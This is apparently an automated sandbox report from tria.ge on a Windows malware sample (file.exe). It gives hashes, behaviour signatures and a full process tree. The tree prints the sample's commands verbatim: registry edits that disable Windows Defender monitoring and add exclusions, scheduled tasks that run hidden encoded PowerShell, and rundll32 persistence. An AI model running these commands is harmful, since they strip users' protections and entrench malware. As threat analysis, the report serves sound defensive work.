Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
10/10/2022, 16:02
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
456fbfc6882e5cd43c664e82cab46161
-
SHA1
0925b9f40a180a9bcfbb0fc0de13bce972b1dec2
-
SHA256
a9f8fc323b93d0e5084212c62e9ab102668d6ece874096178d0386e58de98919
-
SHA512
a8aa84c973c62c38a5a3bbda0db5fa1ac99f25d3c2a8982315efdec16da7ac7b8df78e5f9d372dca68ff9da27df641d3156d14d128d2b9fc483f48e950c6fe4c
-
SSDEEP
196608:91OJjvoHCZOQSreJVQK3Q10nmb0F4Nvdk83AzOE4XsFiIZ3Fu0qvZgO:3OJk+Kre/QtbpvdkB4Xso8FuJgO
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops Chrome extension 1 IoCs
-
Drops file in System32 directory 17 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS1E6A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS2CAD.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfCWALYmA" /SC once /ST 15:13:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfCWALYmA"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfCWALYmA"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bFmTPRIbFUTpbCJKKp" /SC once /ST 16:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lXjMOKIfViuXxgfEi\OxxucIAIMPDsCEk\pqBhmrR.exe\" GL /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1538E97B-54C8-4B6A-87C1-8AFCC922C857} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {4866AE9C-3E00-42D4-B842-162120991CE1} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\lXjMOKIfViuXxgfEi\OxxucIAIMPDsCEk\pqBhmrR.exeC:\Users\Admin\AppData\Local\Temp\lXjMOKIfViuXxgfEi\OxxucIAIMPDsCEk\pqBhmrR.exe GL /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geuiMEoGt" /SC once /ST 05:20:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geuiMEoGt"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geuiMEoGt"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGedILevh" /SC once /ST 11:08:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGedILevh"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGedILevh"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\DqqpsCessXFqdFpq\XcWzziQk\yDBPRZCwMGOmEXXj.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\DqqpsCessXFqdFpq\XcWzziQk\yDBPRZCwMGOmEXXj.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcQBYHwmLrIU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcQBYHwmLrIU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DkvxDxdJRMKKbbPFPtR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DkvxDxdJRMKKbbPFPtR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OyGyVqLCXKUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OyGyVqLCXKUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aazYDpmAU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aazYDpmAU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xaLEnBzGCyciC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xaLEnBzGCyciC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RXXjOxYqdtOKwXVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RXXjOxYqdtOKwXVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lXjMOKIfViuXxgfEi" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lXjMOKIfViuXxgfEi" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcQBYHwmLrIU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcQBYHwmLrIU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DkvxDxdJRMKKbbPFPtR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DkvxDxdJRMKKbbPFPtR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OyGyVqLCXKUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OyGyVqLCXKUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aazYDpmAU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aazYDpmAU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xaLEnBzGCyciC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xaLEnBzGCyciC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RXXjOxYqdtOKwXVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RXXjOxYqdtOKwXVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lXjMOKIfViuXxgfEi" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lXjMOKIfViuXxgfEi" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DqqpsCessXFqdFpq" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkPOqbKlI" /SC once /ST 10:28:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkPOqbKlI"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkPOqbKlI"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IwUIDUlWwCCaleROq" /SC once /ST 11:08:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\DqqpsCessXFqdFpq\SeFoGryJSoVOCWO\JWXGzEb.exe\" Tb /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "IwUIDUlWwCCaleROq"3⤵
-
-
-
C:\Windows\Temp\DqqpsCessXFqdFpq\SeFoGryJSoVOCWO\JWXGzEb.exeC:\Windows\Temp\DqqpsCessXFqdFpq\SeFoGryJSoVOCWO\JWXGzEb.exe Tb /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bFmTPRIbFUTpbCJKKp"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\aazYDpmAU\kZjjKj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yQJFyOflsJsySqW" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.2MB
MD556eb94a936cf7a9f0c7c7d56b9f805a0
SHA1c0f8b038bf419252e98f4b2777264a7c7fbd1c08
SHA2562c5535fd143446523fcaf514077d6ad80257805f83ed391ba4954229bbfa9257
SHA5121dfde425e55fb37363b4a83922cdd7ace6dbcffd70d13fd097c9c89e5c8fc3867200f41f5725d01d712d656a807d5ff023bc7e441c39538a506f1f5e8266d420
-
Filesize
6.2MB
MD556eb94a936cf7a9f0c7c7d56b9f805a0
SHA1c0f8b038bf419252e98f4b2777264a7c7fbd1c08
SHA2562c5535fd143446523fcaf514077d6ad80257805f83ed391ba4954229bbfa9257
SHA5121dfde425e55fb37363b4a83922cdd7ace6dbcffd70d13fd097c9c89e5c8fc3867200f41f5725d01d712d656a807d5ff023bc7e441c39538a506f1f5e8266d420
-
Filesize
6.7MB
MD55cc92c7a5cd84bb226780fadbdd4349c
SHA1bedcb81a19fc8742f28cbf3648a9015ef13bb287
SHA25623ffb2d15677525f5e482f63bfae8b3c61f840080c958f7fd4470c4eac7481bf
SHA51262b6ec16aa0eb44a9848e88dfc8482ca4d7e8439433464d3de7487eab4d1b66f0daed6a60afd0aed8948fc136d655c35922ff190f7048a60429365446bf52eeb
-
Filesize
6.7MB
MD55cc92c7a5cd84bb226780fadbdd4349c
SHA1bedcb81a19fc8742f28cbf3648a9015ef13bb287
SHA25623ffb2d15677525f5e482f63bfae8b3c61f840080c958f7fd4470c4eac7481bf
SHA51262b6ec16aa0eb44a9848e88dfc8482ca4d7e8439433464d3de7487eab4d1b66f0daed6a60afd0aed8948fc136d655c35922ff190f7048a60429365446bf52eeb
-
Filesize
6.7MB
MD55cc92c7a5cd84bb226780fadbdd4349c
SHA1bedcb81a19fc8742f28cbf3648a9015ef13bb287
SHA25623ffb2d15677525f5e482f63bfae8b3c61f840080c958f7fd4470c4eac7481bf
SHA51262b6ec16aa0eb44a9848e88dfc8482ca4d7e8439433464d3de7487eab4d1b66f0daed6a60afd0aed8948fc136d655c35922ff190f7048a60429365446bf52eeb
-
Filesize
6.7MB
MD55cc92c7a5cd84bb226780fadbdd4349c
SHA1bedcb81a19fc8742f28cbf3648a9015ef13bb287
SHA25623ffb2d15677525f5e482f63bfae8b3c61f840080c958f7fd4470c4eac7481bf
